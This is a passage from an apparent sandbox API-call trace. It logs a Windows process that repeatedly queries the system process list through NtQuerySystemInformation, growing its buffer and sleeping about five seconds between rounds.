Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.328] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.337] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.356] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.388] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.416] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.427] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.444] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.479] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.489] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.498] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.509] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.519] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.529] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) 